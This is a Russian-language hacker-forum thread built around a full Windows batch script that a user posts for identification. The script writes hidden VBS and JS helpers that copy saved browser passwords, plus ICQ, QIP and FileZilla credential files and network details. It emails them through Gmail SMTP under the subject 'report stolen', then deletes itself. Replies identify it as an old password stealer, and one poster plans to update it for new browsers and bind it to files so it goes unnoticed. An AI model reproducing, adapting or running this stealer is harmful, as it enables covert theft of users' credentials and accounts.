1. ihtr13

    ihtr13 New Member

    Joined:
    27 Jan 2011
    Messages:
    49
    Likes Received:
    4
    Reputations:
    -1
    что это?

    @echo off
    cls
    mkdir c:\cache\load\%1
    echo Dim oShell>>c:\cache\load\url.vbs
    echo Dim oShortCut>>c:\cache\load\url.vbs
    echo set oShell = WScript.CreateObject ("WScript.Shell")>>c:\cache\load\url.vbs

    echo var shell = new ActiveXObject("WScript.shell");>>c:\cache\load\ip.js
    echo shell.run("cmd.exe /c ipconfig >>c:/cache/load/ip.txt"), 0, false;>>c:\cache\load\ip.js
    echo shell.Quit;>>c:\cache\load\ip.js
    echo Set s=WScript.CreateObject("WScript.Shell")>>xcopy.vbs
    echo s.Run "c:\cache\load\tmp.bat",0,false>>xcopy.vbs
    echo Set v=WScript.CreateObject("WScript.Shell")>>xcopy.vbs
    echo v.Run "c:\cache\load\smtp.vbs",0,false>>xcopy.vbs
    echo WScript.Sleep(2000)>>xcopy.vbs

    start c:\cache\load\ip.js
    start xcopy.vbs
    start c:\cache\load\url.vbs
    echo on error resume next>>c:\cache\load\smtp.vbs
    echo WScript.Sleep(42000)>>c:\cache\load\smtp.vbs

    echo cd/d %appdata%\ICQ\000000\>>c:\cache\load\tmp.bat
    echo copy /y Owner.qdb %systemdrive%\cache\Owner.qdb>>c:\cache\load\tmp.bat
    echo cd/d %appdata%\mozilla\firefox\profiles\*.default\>>c:\cache\load\tmp.bat
    echo copy /y key3.db %systemdrive%\cache\key3.db>>c:\cache\load\tmp.bat
    echo copy /y signons.sqlite %systemdrive%\cache\signons.sqlite>>c:\cache\load\tmp.bat
    echo cd/d %APPDATA%\Opera\Opera\>>c:\cache\load\tmp.bat
    echo copy /y wand.dat %SystemDrive%\cache\wand.dat >>c:\cache\load\tmp.bat
    echo Xcopy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Login Data" /s /y /d /h /c "C:\cache">>c:\cache\load\tmp.bat
    echo Xcopy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Web Data" /s /y /d /h /c "C:\cache">>c:\cache\load\tmp.bat
    echo cd/d %appdata%\FileZilla\>>c:\cache\load\tmp.bat
    echo copy /y recentservers.xml %systemdrive%\cache\recentservers.xml>>c:\cache\load\tmp.bat
    echo cd/d %appdata%\QIP\Profiles\0000000\>>c:\cache\load\tmp.bat
    echo copy /y 0000000.bip %systemdrive%\cache\0000000.bip>>c:\cache\load\tmp.bat

    echo Set WshShell = CreateObject("WScript.Shell")>>c:\cache\load\smtp.vbs

    echo Const EmailFrom = "[email protected]">>c:\cache\load\smtp.vbs
    echo Const EmailPassword = "abvgvk000">>c:\cache\load\smtp.vbs
    echo Const strSmtpServer = "Smtp.gmail.com">>c:\cache\load\smtp.vbs
    echo Const EmailTo = "[email protected]" >>c:\cache\load\smtp.vbs

    echo Set objEmail = CreateObject("CDO.Message")>>c:\cache\load\smtp.vbs
    echo Set FSO = CreateObject("sсriрting.FileSystemObject")>>c:\cache\load\smtp.vbs
    echo objEmail.From = EmailFrom>>c:\cache\load\smtp.vbs
    echo objEmail.To = EmailTo>>c:\cache\load\smtp.vbs
    echo objEmail.Subject = "report stolen">>c:\cache\load\smtp.vbs
    echo objEmail.Textbody = "the robot brought the passwords">>c:\cache\load\smtp.vbs

    echo objEmail.AddAttachment "C:\cache\key3.db">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "C:\cache\signons.sqlite">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "C:\cache\wand.dat">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "C:\cache\Login Data">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "C:\cache\Web Data">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "C:\cache\Owner.qdb">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "c:\cache\load\ip.txt">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "c:\cache\recentservers.xml">>c:\cache\load\smtp.vbs
    echo objEmail.AddAttachment "c:\cache\0000000.bip">>c:\cache\load\smtp.vbs

    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 02>>c:\cache\load\smtp.vbs
    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 01>>c:\cache\load\smtp.vbs
    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = EmailFrom>>c:\cache\load\smtp.vbs
    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = EmailPassword>>c:\cache\load\smtp.vbs
    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = strSmtpServer>>c:\cache\load\smtp.vbs
    echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25>>c:\cache\load\smtp.vbs

    echo objEmail.Configuration.Fields.Update>>c:\cache\load\smtp.vbs
    echo objEmail.Send>>c:\cache\load\smtp.vbs

    echo set FSO=CreateObject("Scripting.FileSystemObject")>>c:\cache\load\del.vbs

    echo FSO.Deletefile "xcopy.vbs">>c:\cache\load\del.vbs
    echo FSO.Deletefolder "c:\cache">>c:\cache\load\del.vbs
    echo FSO.Deletefile "profilepic42069_1.bat">>c:\cache\load\del.vbs
    echo FSO.Deletefile "tmp.bat">>c:\cache\load\del.vbs

    echo Set a=WScript.CreateObject("WScript.Shell")>>c:\cache\load\smtp.vbs
    echo a.Run "c:\cache\load\del.vbs">>c:\cache\load\smtp.vbs
    echo WScript.Sleep(48000)>>c:\cache\load\del.vbs
     
  2. Metal-Core

    Metal-Core Member

    Joined:
    20 Sep 2011
    Messages:
    224
    Likes Received:
    21
    Reputations:
    0
    Очень старо.. шлет файлы пассов от браузеров на почту. хрень полная.
     
    1 person likes this.
  3. PakZ

    PakZ New Member

    Joined:
    24 Dec 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Взять и переделать под новые версии браузеров. Займусь после сессии. Ведь это бат,а бат очень весело цеплять к файлам) И непалевно)
     
  4. ihtr13

    ihtr13 New Member

    Joined:
    27 Jan 2011
    Messages:
    49
    Likes Received:
    4
    Reputations:
    -1
    echo Const EmailFrom = "[email protected]">>c:\cache\load\smtp.vbs
    echo Const EmailPassword = "abvgvk000">>c:\cache\load\smtp.vbs
    точна крыса :D
     
  5. canovaro01

    canovaro01 New Member

    Joined:
    24 May 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    кто объяснить что значит "крыса"?
     
  6. In_flames

    In_flames New Member

    Joined:
    15 May 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    трой, стучалка или бекдор вариаций много))